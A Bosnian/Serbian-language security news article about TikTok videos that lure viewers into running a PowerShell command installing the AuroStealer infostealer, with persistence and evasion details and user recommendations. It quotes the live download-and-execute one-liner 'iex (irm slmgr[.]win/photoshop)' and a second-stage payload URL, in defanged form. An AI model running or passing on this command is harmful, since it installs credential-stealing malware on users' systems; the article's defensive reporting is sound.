TikTok snimci isporučuju AuroStealer

AUTOR ·

TikTok se sve češće povezuje s AuroStealer, zlonamjernim softverom koji se distribuira upravo preko ove platforme. Prema izvještaju izvještaju Internet Storm Centra, zlonamjerni akteri zloupotrebljavaju TikTok sadržaj kako bi širili AuroStealer putem PowerShell okruženja, oslanjajući se na taktike društvenog inženjeringa kojima obmanjuju nesvjesne korisnike.

TikTok & AuroStealer

TikTok snimci isporučuju AuroStealer; Source: Bing Image Creator

TIKTOK I ZLONAMJERNI SOFTVER

U posljednje vrijeme zlonamjerni akteri sve češće koriste društvene medije za distribuciju naprednog zlonamjernog softvera. Jedna od platformi koja je postala meta ovakvih aktivnosti jeste TikTok, popularna aplikacija za dijeljenje video zapisa sa više od milijardu aktivnih korisnika širom svijeta.

Sigurnosni istraživači identifikovali su niz video zapisa na TikTok koji služe za namamljivanje žrtava da preuzmu i pokrenu zlonamjerni softver. Takvi sadržaji često obećavaju besplatnu aktivaciju poznatih aplikacija, poput Adobe Photoshop, kako bi privukli pažnju gledalaca.

Zlonamjerni akteri se pritom oslanjaju na taktike društvenog inženjeringa, ubjeđujući korisnike da izvrše PowerShell komandu sa administratorskim privilegijama. Na taj način na njihove sisteme dospijeva AuroStealer, zlonamjerni softver posebno dizajniran da kroz višestepeni lanac infekcije izbjegne bezbjednosne mehanizme i uspostavi trajno prisustvo na kompromitovanim uređajima.

Cijela kampanja oslanja se na ogromnu bazu korisnika i otvorenu prirodu TikTok platforme, što zlonamjernim akterima omogućava da kreiraju sadržaj koji lako dopire do široke publike. Dodatno, činjenica da pojedini video zapisi bilježe i preko 500 lajkova pokazuje da su ove prevare dovoljno uvjerljive da privuku značajan broj potencijalnih žrtava.

 

Funkcionisanje

Zlonamjerni akteri u ovoj kampanji traže od korisnika da izvrše PowerShell komandu sa administratorskim privilegijama koristeći sljedeću jednorednu naredbu:

iex (irm slmgr[.]win/photoshop)

Ova komanda osmišljena je da preuzme i pokrene zlonamjerni PowerShell skript prve faze, koji je na VirusTotal platformi zabilježen sa rezultatom detekcije 17/63. Niska stopa otkrivanja ukazuje na to da ova varijanta zlonamjernog softvera koristi napredne tehnike izbjegavanja, što značajno otežava prepoznavanje tradicionalnim bezbjednosnim alatima.

Upotreba PowerShell okruženja kao vektora infekcije nije rijetkost u savremenim napadima. Kao moćan skriptni jezik ugrađen u Windows sisteme, PowerShell zlonamjernim akterima omogućava izvršavanje složenih komandi i skripti bez izazivanja sumnje. U ovom slučaju, skript prve faze preuzima se sa adrese slmgr[.]win/photoshop, koja na prvi pogled može izgledati bezopasno, ali zapravo služi kao kanal za isporuku zlonamjernog softvera.

Nakon što se komanda izvrši, skript prve faze automatski se pokreće na sistemu žrtve i odmah preuzima sadržaj druge faze sa adrese hxxps://file-epq[.]pages[.]dev/updater.exe. Ova sekundarna izvršna datoteka identifikovana je kao AuroStealer, zlonamjerni softver razvijen za prikupljanje osjetljivih podataka sa kompromitovanih sistema. Njegova upotreba u ovoj kampanji naglašava značaj stalnog praćenja i analize mrežnog saobraćaja radi otkrivanja sumnjivih aktivnosti.

Karakteristike AuroStealera, uključujući tehnike izbjegavanja i mehanizme postojanosti, jasno ukazuju na potrebu za snažnim bezbjednosnim mjerama i sistemima za nadzor. Razumijevanjem ovakvih taktika, branioci mogu unaprijediti svoju pripremljenost i bolje zaštititi organizacije od kompromitovanja.

 

Mehanizmi postojanosti

Zlonamjerna kampanja ostvaruje postojanost putem zakazanih zadataka koji se predstavljaju kao legitimni Windows servisi, među kojima su:

  • MicrosoftEdgeUpdateTaskMachineCore,
  • GoogleUpdateTaskMachineCore,
  • AdobeUpdateTask,
  •  WindowsUpdateCheck.

Nazivi ovih zadataka biraju se nasumično kako bi se izbjegli obrasci koje bezbjednosni sistemi mogu prepoznati. Korištenje imena koja podsjećaju na originalne sistemske procese omogućava da se zlonamjerni kôd uklopi u okruženje i da se izvršava pri svakoj prijavi korisnika, bez izazivanja sumnje.

Ovaj mehanizam postojanosti osmišljen je da zadrži uporište na kompromitovanom sistemu, čime zlonamjernim akterima omogućava dugotrajan pristup i kontinuirano prikupljanje osjetljivih podataka. Na taj način, zlonamjerni softver ostaje aktivan tokom dužeg vremenskog perioda, otežavajući njegovo otkrivanje i uklanjanje.

 

Napredne tehnike izbjegavanja

Ova zlonamjerna kampanja zasniva se na tehnici samo-prevođenja kôda kako bi izbjegla otkrivanje. Treći korisni teret, source.exe, poziva Windows C# prevodilac csc.exe sa putanje C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe i na taj način prevodi zlonamjerni kôd direktno na računaru žrtve tokom izvršavanja. Time softver može dinamički formirati i pokretati prevedeni kôd bez ostavljanja trajnog traga na disku, što u velikoj mjeri otežava njegovo prepoznavanje antivirusnim rješenjima zasnovanim na potpisima ili sistemima za analizu ponašanja. Upravo ova tehnika, koju koristi source.exe, pokazuje kako zlonamjerni akteri stalno usavršavaju metode da bi ostali ispred bezbjednosnih mjera.

Prevedeni kôd zatim koristi Windows API funkcije VirtualAlloc, CreateThread i WaitForSingleObject kako bi obavljao ključne operacije potrebne za izvršavanje zlonamjernog tereta. VirtualAlloc omogućava rezervisanje i dodjelu memorije na kompromitovanom računaru, CreateThread pokretanje novih niti i izvršavanje komandnog kôda direktno u memoriji, dok WaitForSingleObject održava proces aktivnim i u stanju čekanja sve dok se ne ispuni određeni uslov. Na ovaj način softver dinamički upravlja memorijom, pokreće izvršavanje kôda i održava svoju aktivnost, čime dodatno otežava njegovo otkrivanje i uklanjanje.

Posebno je značajno što konačni zlonamjerni kôd ne postoji u prevedenom obliku na disku sve do trenutka izvršavanja. Zbog toga je mala vjerovatnoća da će tradicionalna antivirusna rješenja ili sistemi za analizu ponašanja na vrijeme prepoznati prijetnju, budući da softver može generisati i izvršiti kôd direktno u memoriji, bez ostavljanja trajnih tragova.

 

UTICAJ

Zloupotreba TikTok platforme za isporuku AuroStealer zlonamjernog softvera ima dalekosežne posljedice kako za korisnike, tako i za organizacije. Ova prijetnja predstavlja ozbiljan rizik po bezbjednost pojedinaca koji koriste društvene medije, naročito one sa ogromnim bazama korisnika poput TikToka. Posljedice nisu ograničene samo na kompromitovanje ličnih podataka, već se odražavaju i na reputaciju i finansijsku stabilnost same platforme.

Iskorištavanje naizgled bezopasnih video snimaka na TikToku stvorilo je okruženje u kojem su korisnici sve ranjiviji na sajber napade. Ovaj fenomen jasno pokazuje da i najobičnije digitalne interakcije mogu imati ozbiljne posljedice kada ih ugroze zlonamjerni akteri. Lakoća kojom oni manipulišu društvenim medijima za svoje ciljeve naglašava potrebu za većom sviješću i budnošću među korisnicima. Posebno zabrinjava činjenica da je eksploatacija TikTok sadržaja doprinijela stvaranju kulture u kojoj su pojedinci sve podložniji sajber prijetnjama.

Dugoročni efekti ovakvih napada na sajber bezbjednost ne mogu se potcijeniti. Kako zlonamjerni akteri nastavljaju nekažnjeno da koriste društvene medije, postaje očigledno da su neophodne suštinske promjene u ponašanju korisnika, ali i u protokolima organizacione zaštite. Ignorisanje ovog problema samo će produbiti postojeće ranjivosti i učiniti korisnike još osjetljivijim na buduće napade.

 

ZAKLJUČAK

Iskorištavanje TikTok video snimaka od strane zlonamjernih aktera pojavilo se kao ozbiljna i rastuća prijetnja. Ovaj fenomen pokazuje kako se društveni mediji mogu pretvoriti u kanale za distribuciju zlonamjernog softvera, pri čemu se koriste napredne tehnike poput direktnog izvršavanja kôda u memoriji i samo-prevođenja, što značajno otežava detekciju i analizu. Time se potvrđuje da tradicionalne metode zaštite više nisu dovoljne i da je neophodan sveobuhvatan i proaktivan pristup sajber bezbjednosti.

Takav pristup podrazumijeva redovno ažuriranje softverskih konfiguracija, primjenu naprednih alata za otkrivanje prijetnji i uvođenje sistema ranog upozoravanja na samim društvenim medijima. Međutim, tehnička rješenja sama po sebi nisu dovoljna. Ključnu ulogu ima i edukacija korisnika, jer svijest o rizicima i poznavanje bezbjednih praksi predstavljaju prvu liniju odbrane. Samo kombinacijom tehnoloških mjera i informisanih korisnika moguće je značajno smanjiti prostor za djelovanje zlonamjernih aktera.

Primjer AuroStealer zlonamjernog softvera i zloupotrebe TikTok platforme jasno pokazuje da sajber prijetnje neprestano evoluiraju i da će zlonamjerni akteri uvijek tražiti nove načine da iskoriste popularne digitalne servise. Zbog toga je od presudne važnosti da i organizacije i pojedinci ostanu budni, prilagodljivi i spremni da unaprijede svoje bezbjednosne strategije. Samo na taj način može se očuvati povjerenje u društvene medije i obezbijediti sigurnije digitalno okruženje za sve korisnike.

 

PREPORUKE

Rastuća zloupotreba TikTok platforme, ali i drugih digitalnih medija, za širenje zlonamjernog softvera pokazuje koliko su sajber napadi postali napredni. Da bi očuvali podatke i bezbjednost, i korisnici i organizacije moraju razviti jasne navike i strategije. Sljedeće preporuke nude praktične korake za smanjenje rizika:

  1. Prilikom interakcije sa platformama društvenih medija poput TikToka, neophodno je biti oprezan i biti svjestan potencijalnih prijetnji koje vrebaju u naizgled bezopasnim video zapisima ili objavama. Poznato je da zlonamjerni akteri koriste ove platforme u zlonamjerne svrhe, uključujući širenje linkova sa zlonamjernim softverom kao što je AuroStealer.
  2. Korisnici nikada ne bi trebalo da pokreću terminalne komande iz neprovjerenih izvora, jer to može dovesti do izvršavanja zlonamjernog kôda na njihovim sistemima. Ključno je provjeriti autentičnost i pouzdanost bilo kog izvora prije izvršavanja komandi ili praćenja uputstava.
  3. Organizacije i pojedinci moraju dati prioritet implementaciji robusne odbrane krajnjih tačaka kako bi se zaštitili od novih prijetnji poput onih opisanih u ovom kontekstu. Ovo uključuje osiguravanje da su svi uređaji, bilo da su lični ili u korporativnom vlasništvu, opremljeni ažuriranim bezbjednosnim softverom i konfiguracijama.
  4. Važno je da korisnici i organizacije budu informisani o najnovijim taktikama koje koriste zlonamjerni akteri. Praćenjem novih prijetnji i trendova u sajber bezbjednosti, pojedinci, ali i organizacije se mogu bolje zaštititi od potencijalnih napada.
  5. Zlonamjerni akteri su u ovom slučaju iskoristili PowerShell okruženje kao sredstvo za isporuku kôda za izvršavanje zlonamjernog softvera direktno u memoriju. Korisnici treba da budu izuzetno oprezni prilikom izvršavanja PowerShell komandi, posebno ako potiču iz nepoznatih ili sumnjivih izvora.
  6. Korisnici treba redovno da pregledaju i ažuriraju podešavanja konfiguracije na svim uređajima kako bi se osigurali da nisu ranjivi na poznate eksploatacije ili napade. Ovo uključuje ažuriranje operativnih sistema, aplikacija i bezbjednosnog softvera najnovijim ispravkama i ažuriranjima.
  7. Korisnici moraju biti edukovani o potencijalnim opasnostima koje vrebaju u naizgled bezopasnim video zapisima ili objavama koje se dijele putem kanala društvenih medija poput TikTok. Negovanjem kulture svijesti i budnosti, pojedinci se mogu bolje zaštititi od novih prijetnji.

Preporuke iznad imaju za cilj da korisnicima pruže jasne i praktične smjernice za zaštitu sistema od novih prijetnji poput onih opisanih u ovom tekstu. Davanjem prioriteta snažnim odbranama krajnjih tačaka, stalnim informisanjem o razvoju taktika zlonamjernih aktera i dosljednom primjenom bezbjednih praksi, i organizacije i pojedinci mogu značajno umanjiti rizik da postanu žrtve ovakvih napada.

Tags:

Možda vas interesuje i...

Komentariši

Vaša email adresa neće biti objavljivana. Neophodna polja su označena sa *


The reCAPTCHA verification period has expired. Please reload the page.